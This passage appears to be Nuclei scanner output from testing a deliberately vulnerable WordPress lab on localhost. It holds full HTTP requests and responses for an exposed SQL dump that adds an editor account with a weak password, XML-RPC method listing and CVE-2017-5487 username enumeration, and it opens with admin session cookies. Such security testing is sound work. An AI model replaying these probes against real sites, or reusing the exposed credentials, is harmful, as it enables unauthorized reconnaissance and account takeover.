Set-Cookie: wordpress_sec_5b2dbabcbcf581dd4a9fba6cd728b7f5=admin%7C1625875845%7CIjupHcsvO6FXdP81dx8iPieeiSceeGqJJf3JNKFAz9K%7Ce65c76bdd3f9e9a0ed18f704f851e3c5a0ca4eac7b3c9d7f060105a101f6905e; path=/wp-content/plugins; secure; HttpOnly
Set-Cookie: wordpress_sec_5b2dbabcbcf581dd4a9fba6cd728b7f5=admin%7C1625875845%7CIjupHcsvO6FXdP81dx8iPieeiSceeGqJJf3JNKFAz9K%7Ce65c76bdd3f9e9a0ed18f704f851e3c5a0ca4eac7b3c9d7f060105a101f6905e; path=/wp-admin; secure; HttpOnly
Set-Cookie: wordpress_logged_in_5b2dbabcbcf581dd4a9fba6cd728b7f5=admin%7C1625875845%7CIjupHcsvO6FXdP81dx8iPieeiSceeGqJJf3JNKFAz9K%7Cf7e1f7899faf365fe7af9bdbd10f01201be5c2fcdd97883fe1410428e0d8a961; path=/; HttpOnly
Vary: Accept-Encoding
X-Powered-By: PHP/7.1.33
<IWPHEADER>_IWP_JSON_PREFIX_eyJlcnJvciI6IkludmFsaWQgYWN0aXZhdGlvbiBrZXkiLCJlcnJvcl9jb2RlIjoiaXdwX21tYl9hZGRfc2l0ZV9pbnZhbGlkX2FjdGl2YXRpb25fa2V5In0=<ENDIWPHEADER>
Reference:
Generated by Nuclei
[default-sql-dump] [medium] MySQL Dump Files found on http://127.0.0.1:31337
Details: default-sql-dump matched at http://127.0.0.1:31337
Protocol: HTTP
Full URL: http://127.0.0.1:31337/dump.sql
Timestamp: Thu Jul 8 00:11:00 +0000 UTC 2021
Template Information
Key | Value |
---|---|
severity | medium |
tags | exposure,backup |
name | MySQL Dump Files |
author | geeknik,dwisiswant0 |
Request
GET /dump.sql HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Range: bytes=0-3000
Response
HTTP/1.1 206 Partial Content
Connection: close
Content-Length: 1191
Accept-Ranges: bytes
Content-Range: bytes 0-1190/1191
Content-Type: application/x-sql
Date: Thu, 08 Jul 2021 00:11:00 GMT
Etag: "4a7-5c691754b9b00"
Last-Modified: Thu, 08 Jul 2021 00:08:44 GMT
Server: Apache/2.4.38 (Debian)
-- MySQL dump 10.13 Distrib 5.7.26, for Linux (x86_64)
--
-- Host: localhost Database: wordpress
-- ------------------------------------------------------
-- Server version 5.7.26-0ubuntu0.18.04.1
LOCK TABLES `wp_posts` WRITE;
UPDATE `wp_posts` SET `post_content` = '<!-- wp:paragraph -->\r\n<p>Welcome to Damn Vulnerable WordPress. This is your first post. Edit or delete it, then start writing!</p>\r\n<!-- /wp:paragraph -->', `post_title` = 'Hack Me If You Can', `post_name` = 'hack-me-if-you-can' WHERE `wp_posts`.`ID` = 1;
UNLOCK TABLES;
LOCK TABLES `wp_users` WRITE;
INSERT INTO `wordpress`.`wp_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_registered`) VALUES ('2', 'editor', MD5('editor'), 'Editor', '[email protected]', '2020-01-01 00:00:00');
UNLOCK TABLES;
LOCK TABLES `wp_usermeta` WRITE;
INSERT INTO `wordpress`.`wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '2', 'wp_capabilities', 'a:1:{s:6:"editor";b:1;}');
UNLOCK TABLES;
LOCK TABLES `wp_usermeta` WRITE;
INSERT INTO `wordpress`.`wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '2', 'wp_user_level', '7');
UNLOCK TABLES;
Generated by Nuclei
[tech-detect:php] [info] Wappalyzer Technology Detection found on http://127.0.0.1:31337
Details: tech-detect:php matched at http://127.0.0.1:31337
Protocol: HTTP
Full URL: http://127.0.0.1:31337
Timestamp: Wed Jul 7 00:11:20 +0000 UTC 2021
Template Information
Key | Value |
---|---|
name | Wappalyzer Technology Detection |
author | hakluke |
severity | info |
tags | tech |
Request
GET / HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Response
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=UTF-8
Date: Wed, 07 Jul 2021 00:11:19 GMT
Link: <http://127.0.0.1:31337/index.php?rest_route=/>; rel="https://api.w.org/"
Server: Apache/2.4.38 (Debian)
Set-Cookie: wp_wpfileupload_5b2dbabcbcf581dd4a9fba6cd728b7f5=hCKbRjnKBTDQtQQdKBXshyXSkGyMxFrm; expires=Fri, 09-Jul-2021 00:11:19 GMT; Max-Age=172800; path=/
Vary: Accept-Encoding
X-Powered-By: PHP/7.1.33
<!DOCTYPE html>
<html class="no-js" lang="en-US">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0" >
<link rel="profile" href="https://gmpg.org/xfn/11">
<title>Damn Vulnerable WordPress – Just another WordPress site</title>
<!-- Social Warfare v3.5.2 https://warfareplugins.com --><style>@font-face {font-family: "sw-icon-font";src:url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.5.2");src:url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.5.2#iefix") format("embedded-opentype"),url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.woff?ver=3.5.2") format("woff"),
url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.ttf?ver=3.5.2") format("truetype"),url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.svg?ver=3.5.2#1445203416") format("svg");font-weight: normal;font-style: normal;}</style>
<!-- Social Warfare v3.5.2 https://warfareplugins.com -->
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Damn Vulnerable WordPress » Feed" href="http://127.0.0.1:31337/?feed=rss2" />
<link rel="alternate" type="application/rss+xml" title="Damn Vulnerable WordPress » Comments Feed" href="http://127.0.0.1:31337/?feed=comments-rss2" />
<script>
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/127.0.0.1:31337\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.3"}};
!function(e,a,t){var r,n,o,i,p=a.createElement("canvas"),s=p.getContext&&p.getContext("2d");function c(e,t){var a=String.fromCharCode;s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,e),0,0);var r=p.toDataURL();return s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,t),0,0),r===p.toDataURL()}function l(e){if(!s||!s.fillText)return!1;switch(s.textBaseline="top",s.font="600 32px Arial",e){case"flag":return!c([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])&&(!c([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!c([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]));case"emoji":return!c([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340])}return!1}function d(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(i=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},o=0;o<i.length;o++)t.supports[i[o]]=l(i[o]),t.supports.everything=t.supports.everything&&t.supports[i[o]],"flag"!==i[o]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[i[o]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(r=t.source||{}).concatemoji?d(r.concatemoji):r.wpemoji&&r.twemoji&&(d(r.twemoji),d(r.wpemoji)))}(window,document,window._wpemojiSettings);
</script>
<style>
img.wp-smiley,
img.emoji {
display: inline !important;
border: none !important;
box-shadow: none !important;
height: 1em !important;
width: 1em !important;
margin: 0 .07em !important;
vertical-align: -0.1em !important;
background: none !important;
padding: 0 !important;
}
</style>
<link rel='stylesheet' id='social-warfare-block-css-css' href='http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/js/post-editor/dist/blocks.style.build.css?ver=5.3' media='all' />
<link rel='stylesheet' id='wp-block-library-css' href='http://127.0.0.1:31337/wp-includes/css/dist/block-library/style.min.css?ver=5.3' media='all' />
<link rel='stylesheet' id='js-autocomplete-css' href='http://127.0.0.1:31337/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/jquery.autocomplete.css?ver=1.0' media='all' />
<link rel='stylesheet' id='wordpress-file-upload-style-css' href='http://127.0.0.1:31337/wp-content/plugins/wp-file-upload/css/wordpre.... Truncated ....
Generated by Nuclei
[tech-detect:wordpress] [info] Wappalyzer Technology Detection found on http://127.0.0.1:31337
Details: tech-detect:wordpress matched at http://127.0.0.1:31337
Protocol: HTTP
Full URL: http://127.0.0.1:31337
Timestamp: Thu Jul 8 00:10:52 +0000 UTC 2021
Template Information
Key | Value |
---|---|
name | Wappalyzer Technology Detection |
author | hakluke |
severity | info |
tags | tech |
Request
GET / HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Response
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=UTF-8
Date: Thu, 08 Jul 2021 00:10:52 GMT
Link: <http://127.0.0.1:31337/index.php?rest_route=/>; rel="https://api.w.org/"
Server: Apache/2.4.38 (Debian)
Set-Cookie: wp_wpfileupload_5b2dbabcbcf581dd4a9fba6cd728b7f5=rg5qcGMHc4cQSA69smOqz9DfxaQBrEsB; expires=Sat, 10-Jul-2021 00:10:52 GMT; Max-Age=172800; path=/
Vary: Accept-Encoding
X-Powered-By: PHP/7.1.33
<!DOCTYPE html>
<html class="no-js" lang="en-US">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0" >
<link rel="profile" href="https://gmpg.org/xfn/11">
<title>Damn Vulnerable WordPress – Just another WordPress site</title>
<!-- Social Warfare v3.5.2 https://warfareplugins.com --><style>@font-face {font-family: "sw-icon-font";src:url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.5.2");src:url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.5.2#iefix") format("embedded-opentype"),url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.woff?ver=3.5.2") format("woff"),
url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.ttf?ver=3.5.2") format("truetype"),url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.svg?ver=3.5.2#1445203416") format("svg");font-weight: normal;font-style: normal;}</style>
<!-- Social Warfare v3.5.2 https://warfareplugins.com -->
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Damn Vulnerable WordPress » Feed" href="http://127.0.0.1:31337/?feed=rss2" />
<link rel="alternate" type="application/rss+xml" title="Damn Vulnerable WordPress » Comments Feed" href="http://127.0.0.1:31337/?feed=comments-rss2" />
<script>
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/127.0.0.1:31337\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.3"}};
!function(e,a,t){var r,n,o,i,p=a.createElement("canvas"),s=p.getContext&&p.getContext("2d");function c(e,t){var a=String.fromCharCode;s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,e),0,0);var r=p.toDataURL();return s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,t),0,0),r===p.toDataURL()}function l(e){if(!s||!s.fillText)return!1;switch(s.textBaseline="top",s.font="600 32px Arial",e){case"flag":return!c([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])&&(!c([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!c([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]));case"emoji":return!c([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340])}return!1}function d(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(i=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},o=0;o<i.length;o++)t.supports[i[o]]=l(i[o]),t.supports.everything=t.supports.everything&&t.supports[i[o]],"flag"!==i[o]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[i[o]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(r=t.source||{}).concatemoji?d(r.concatemoji):r.wpemoji&&r.twemoji&&(d(r.twemoji),d(r.wpemoji)))}(window,document,window._wpemojiSettings);
</script>
<style>
img.wp-smiley,
img.emoji {
display: inline !important;
border: none !important;
box-shadow: none !important;
height: 1em !important;
width: 1em !important;
margin: 0 .07em !important;
vertical-align: -0.1em !important;
background: none !important;
padding: 0 !important;
}
</style>
<link rel='stylesheet' id='social-warfare-block-css-css' href='http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/js/post-editor/dist/blocks.style.build.css?ver=5.3' media='all' />
<link rel='stylesheet' id='wp-block-library-css' href='http://127.0.0.1:31337/wp-includes/css/dist/block-library/style.min.css?ver=5.3' media='all' />
<link rel='stylesheet' id='js-autocomplete-css' href='http://127.0.0.1:31337/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/jquery.autocomplete.css?ver=1.0' media='all' />
<link rel='stylesheet' id='wordpress-file-upload-style-css' href='http://127.0.0.1:31337/wp-content/plugins/wp-file-upload/css/wordpre.... Truncated ....
Generated by Nuclei
[tech-detect:wordpress] [info] Wappalyzer Technology Detection found on http://127.0.0.1:31337
Details: tech-detect:wordpress matched at http://127.0.0.1:31337
Protocol: HTTP
Full URL: http://127.0.0.1:31337
Timestamp: Wed Jul 7 00:11:20 +0000 UTC 2021
Template Information
Key | Value |
---|---|
name | Wappalyzer Technology Detection |
author | hakluke |
severity | info |
tags | tech |
Request
GET / HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Response
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=UTF-8
Date: Wed, 07 Jul 2021 00:11:19 GMT
Link: <http://127.0.0.1:31337/index.php?rest_route=/>; rel="https://api.w.org/"
Server: Apache/2.4.38 (Debian)
Set-Cookie: wp_wpfileupload_5b2dbabcbcf581dd4a9fba6cd728b7f5=hCKbRjnKBTDQtQQdKBXshyXSkGyMxFrm; expires=Fri, 09-Jul-2021 00:11:19 GMT; Max-Age=172800; path=/
Vary: Accept-Encoding
X-Powered-By: PHP/7.1.33
<!DOCTYPE html>
<html class="no-js" lang="en-US">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0" >
<link rel="profile" href="https://gmpg.org/xfn/11">
<title>Damn Vulnerable WordPress – Just another WordPress site</title>
<!-- Social Warfare v3.5.2 https://warfareplugins.com --><style>@font-face {font-family: "sw-icon-font";src:url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.5.2");src:url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.5.2#iefix") format("embedded-opentype"),url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.woff?ver=3.5.2") format("woff"),
url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.ttf?ver=3.5.2") format("truetype"),url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.svg?ver=3.5.2#1445203416") format("svg");font-weight: normal;font-style: normal;}</style>
<!-- Social Warfare v3.5.2 https://warfareplugins.com -->
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Damn Vulnerable WordPress » Feed" href="http://127.0.0.1:31337/?feed=rss2" />
<link rel="alternate" type="application/rss+xml" title="Damn Vulnerable WordPress » Comments Feed" href="http://127.0.0.1:31337/?feed=comments-rss2" />
<script>
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/127.0.0.1:31337\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.3"}};
!function(e,a,t){var r,n,o,i,p=a.createElement("canvas"),s=p.getContext&&p.getContext("2d");function c(e,t){var a=String.fromCharCode;s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,e),0,0);var r=p.toDataURL();return s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,t),0,0),r===p.toDataURL()}function l(e){if(!s||!s.fillText)return!1;switch(s.textBaseline="top",s.font="600 32px Arial",e){case"flag":return!c([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])&&(!c([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!c([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]));case"emoji":return!c([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340])}return!1}function d(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(i=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},o=0;o<i.length;o++)t.supports[i[o]]=l(i[o]),t.supports.everything=t.supports.everything&&t.supports[i[o]],"flag"!==i[o]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[i[o]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(r=t.source||{}).concatemoji?d(r.concatemoji):r.wpemoji&&r.twemoji&&(d(r.twemoji),d(r.wpemoji)))}(window,document,window._wpemojiSettings);
</script>
<style>
img.wp-smiley,
img.emoji {
display: inline !important;
border: none !important;
box-shadow: none !important;
height: 1em !important;
width: 1em !important;
margin: 0 .07em !important;
vertical-align: -0.1em !important;
background: none !important;
padding: 0 !important;
}
</style>
<link rel='stylesheet' id='social-warfare-block-css-css' href='http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/js/post-editor/dist/blocks.style.build.css?ver=5.3' media='all' />
<link rel='stylesheet' id='wp-block-library-css' href='http://127.0.0.1:31337/wp-includes/css/dist/block-library/style.min.css?ver=5.3' media='all' />
<link rel='stylesheet' id='js-autocomplete-css' href='http://127.0.0.1:31337/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/jquery.autocomplete.css?ver=1.0' media='all' />
<link rel='stylesheet' id='wordpress-file-upload-style-css' href='http://127.0.0.1:31337/wp-content/plugins/wp-file-upload/css/wordpre.... Truncated ....
Generated by Nuclei
[wordpress-xmlrpc-listmethods] [info] Wordpress XML-RPC List System Methods found on http://127.0.0.1:31337
Details: wordpress-xmlrpc-listmethods matched at http://127.0.0.1:31337
Protocol: HTTP
Full URL: http://127.0.0.1:31337/xmlrpc.php
Timestamp: Wed Jul 7 00:11:19 +0000 UTC 2021
Template Information
Key | Value |
---|---|
name | Wordpress XML-RPC List System Methods |
author | 0ut0fb4nd |
severity | info |
tags | wordpress |
Request
POST /xmlrpc.php HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 123
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
<?xml version="1.0" encoding="utf-8"?><methodCall><methodName>system.listMethods</methodName><params></params></methodCall>
Response
HTTP/1.1 200 OK
Connection: close
Content-Type: text/xml; charset=UTF-8
Date: Wed, 07 Jul 2021 00:11:19 GMT
Server: Apache/2.4.38 (Debian)
Set-Cookie: wp_wpfileupload_5b2dbabcbcf581dd4a9fba6cd728b7f5=jbg7wssbR9bEkTcP2Mm6n9KTj9S3AEXw; expires=Fri, 09-Jul-2021 00:11:19 GMT; Max-Age=172800; path=/
Vary: Accept-Encoding
X-Powered-By: PHP/7.1.33
<?xml version="1.0" encoding="UTF-8"?>
<methodResponse>
<params>
<param>
<value>
<array><data>
<value><string>system.multicall</string></value>
<value><string>system.listMethods</string></value>
<value><string>system.getCapabilities</string></value>
<value><string>demo.addTwoNumbers</string></value>
<value><string>demo.sayHello</string></value>
<value><string>pingback.extensions.getPingbacks</string></value>
<value><string>pingback.ping</string></value>
<value><string>mt.publishPost</string></value>
<value><string>mt.getTrackbackPings</string></value>
<value><string>mt.supportedTextFilters</string></value>
<value><string>mt.supportedMethods</string></value>
<value><string>mt.setPostCategories</string></value>
<value><string>mt.getPostCategories</string></value>
<value><string>mt.getRecentPostTitles</string></value>
<value><string>mt.getCategoryList</string></value>
<value><string>metaWeblog.getUsersBlogs</string></value>
<value><string>metaWeblog.deletePost</string></value>
<value><string>metaWeblog.newMediaObject</string></value>
<value><string>metaWeblog.getCategories</string></value>
<value><string>metaWeblog.getRecentPosts</string></value>
<value><string>metaWeblog.getPost</string></value>
<value><string>metaWeblog.editPost</string></value>
<value><string>metaWeblog.newPost</string></value>
<value><string>blogger.deletePost</string></value>
<value><string>blogger.editPost</string></value>
<value><string>blogger.newPost</string></value>
<value><string>blogger.getRecentPosts</string></value>
<value><string>blogger.getPost</string></value>
<value><string>blogger.getUserInfo</string></value>
<value><string>blogger.getUsersBlogs</string></value>
<value><string>wp.restoreRevision</string></value>
<value><string>wp.getRevisions</string></value>
<value><string>wp.getPostTypes</string></value>
<value><string>wp.getPostType</string></value>
<value><string>wp.getPostFormats</string></value>
<value><string>wp.getMediaLibrary</string></value>
<value><string>wp.getMediaItem</string></value>
<value><string>wp.getCommentStatusList</string></value>
<value><string>wp.newComment</string></value>
<value><string>wp.editComment</string></value>
<value><string>wp.deleteComment</string></value>
<value><string>wp.getComments</string></value>
<value><string>wp.getComment</string></value>
<value><string>wp.setOptions</string></value>
<value><string>wp.getOptions</string></value>
<value><string>wp.getPageTemplates</string></value>
<value><string>wp.getPageStatusList</string></value>
<value><string>wp.getPostStatusList</string></value>
<value><string>wp.getCommentCount</string></value>
<value><string>wp.deleteFile</string></value>
<value><string>wp.uploadFile</string></value>
<value><string>wp.suggestCategories</string></value>
<value><string>wp.deleteCategory</string></value>
<value><string>wp.newCategory</string></value>
<value><string>wp.getTags</string></value>
<value><string>wp.getCategories</string></value>
<value><string>wp.getAuthors</string></value>
<value><string>wp.getPageList</string></value>
<value><string>wp.editPage</string></value>
<value><string>wp.deletePage</string></value>
<value><string>wp.newPage</string></value>
<value><string>wp.getPages</string></value>
<value><string>wp.getPage</string></value>
<value><string>wp.editProfile</string></value>
<value><string>wp.getProfile</string></value>
<value><string>wp.getUsers</string></value>
<value><string>wp.getUser</string></value>
<value><string>wp.getTaxonomies</string></value>
<value><string>wp.getTaxonomy</string></value>
<value><string>wp.getTerms</string></value>
<value><string>wp.getTerm</string></value>
<value><string>wp.deleteTerm</string></value>
<value><string>wp.editTerm</string></value>
<value><string>wp.newTerm</string></value>
<value><string>wp.getPosts</string></value>
<value><string>wp.getPost</string></value>
<value><string>wp.deletePost</string></value>
<value><string>wp.editPost</string></value>
<value><string>wp.newPost</string></value>
<value><string>wp.getUsersBlogs</string></value>
</data></array>
</value>
</param>
</params>
</methodResponse>
Generated by Nuclei
[CVE-2017-5487] [medium] WordPress Core < 4.7.1 - Username Enumeration found on http://127.0.0.1:31337
Details: CVE-2017-5487 matched at http://127.0.0.1:31337
Protocol: HTTP
Full URL: http://127.0.0.1:31337/?rest_route=/wp/v2/users/
Timestamp: Tue Jul 6 13:46:35 +0000 UTC 2021
Template Information
Key | Value |
---|---|
author | Manas_Harsh,daffainfo |
severity | medium |
description | wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request. |
tags | cve,cve2017,wordpress |
name | WordPress Core < 4.7.1 - Username Enumeration |
Request
GET /?rest_route=/wp/v2/users/ HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Response
HTTP/1.1 200 OK
Connection: close
Content-Length: 584
Access-Control-Allow-Headers: Authorization, Content-Type
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages
Allow: GET
Content-Type: application/json; charset=UTF-8
Date: Tue, 06 Jul 2021 13:46:35 GMT
Link: <http://127.0.0.1:31337/index.php?rest_route=/>; rel="https://api.w.org/"
Server: Apache/2.4.38 (Debian)
Set-Cookie: wp_wpfileupload_5b2dbabcbcf581dd4a9fba6cd728b7f5=HSrh9MhFP3thOpy29CC3MsgWsfHqOkPk; expires=Thu, 08-Jul-2021 13:46:35 GMT; Max-Age=172800; path=/
Vary: Origin
X-Content-Type-Options: nosniff
X-Powered-By: PHP/7.1.33
X-Robots-Tag: noindex
X-Wp-Total: 1
X-Wp-Totalpages: 1
[{"id":1,"name":"admin","url":"","description":"","link":"http:\/\/127.0.0.1:31337\/?author=1","slug":"admin","avatar_urls":{"24":"http:\/\/2.gravatar.com\/avatar\/e64c7d89f26bd1972efa854d13d7dd61?s=24&d=mm&r=g","48":"http:\/\/2.gravatar.com\/avatar\/e64c7d89f26bd1972efa854d13d7dd61?s=48&d=mm&r=g","96":"http:\/\/2.gravatar.com\/avatar\/e64c7d89f26bd1972efa854d13d7dd61?s=96&d=mm&r=g"},"meta":[],"_links":{"self":[{"href":"http:\/\/127.0.0.1:31337\/index.php?rest_route=\/wp\/v2\/users\/1"}],"collection":[{"href":"http:\/\/127.0.0.1:31337\/index.php?rest_route=\/wp\/v2\/users"}]}}]
Reference:
Generated by Nuclei
[wp-license-file] [info] WordPress license file disclosure found on http://127.0.0.1:31337
Details: wp-license-file matched at http://127.0.0.1:31337
Protocol: HTTP
Full URL: http://127.0.0.1:31337/license.txt
Timestamp: Wed Jul 7 00:11:21 +0000 UTC 2021
Template Information
Key | Value |
---|---|
name | WordPress license file disclosure |
author | yashgoti |
severity | info |
tags | wordpress |
Request
GET /license.txt HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Response
HTTP/1.1 200 OK
Connection: close
Accept-Ranges: bytes
Content-Type: text/plain
Date: Wed, 07 Jul 2021 00:11:21 GMT
Etag: "4ddf-57e6b80ad6140-gzip"
Last-Modified: Tue, 01 Jan 2019 20:37:49 GMT
Server: Apache/2.4.38 (Debian)
Vary: Accept-Encoding
WordPress - Web publishing software
Copyright 2011-2019 by the contributors
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
